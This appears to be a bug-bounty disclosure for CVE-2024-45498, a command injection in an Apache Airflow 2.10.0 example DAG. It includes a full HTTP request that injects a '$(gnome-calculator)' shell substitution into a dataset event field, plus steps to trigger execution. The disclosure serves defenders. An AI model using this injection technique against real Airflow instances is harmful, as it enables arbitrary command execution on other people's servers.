CVE-2024-45498: Apache Airflow Command injection in read_dataset_event_from_classic DAG

## Summary Command injection vulnerability in `read_dataset_event_from_classic` DAG executes bash command based on `Dataset("s3://output/1.txt")` but attacker with `User` privileges can inject OS command inside `s3://output/1.txt` dataset to execute any OS command. ## Requirements - Airflow version 2.10.0 - DAG: example_inlet_event_extra.py - A user with `create Dataset` and `DAG trigger` permissions ## Step to reproduce 1. Login to `User` permission account. {F3581847} 2. Inject malicous command into `s3://output/1.txt` dataset via the request as show below: ``` POST /api/v1/datasets/events HTTP/1.1 Host: 192.168.168.129:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: application/json Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://192.168.168.129:8080/datasets?uri=s3%3A%2F%2Foutput%2F1.txt Cookie: session=<authen-cookie> Content-Type: application/json Content-Length: 62 {"dataset_uri":"s3://output/1.txt","extra":{"hi":" '$(gnome-calculator)' "}} ``` {F3581851} {F3581850} 3. Go to `DAG` list and trigger `read_dataset_event_from_classic` DAG {F3581853} 4. Go to `read_dataset_event_from_classic` task log to see the output returned. {F3581844} ## Impact Execute any OS command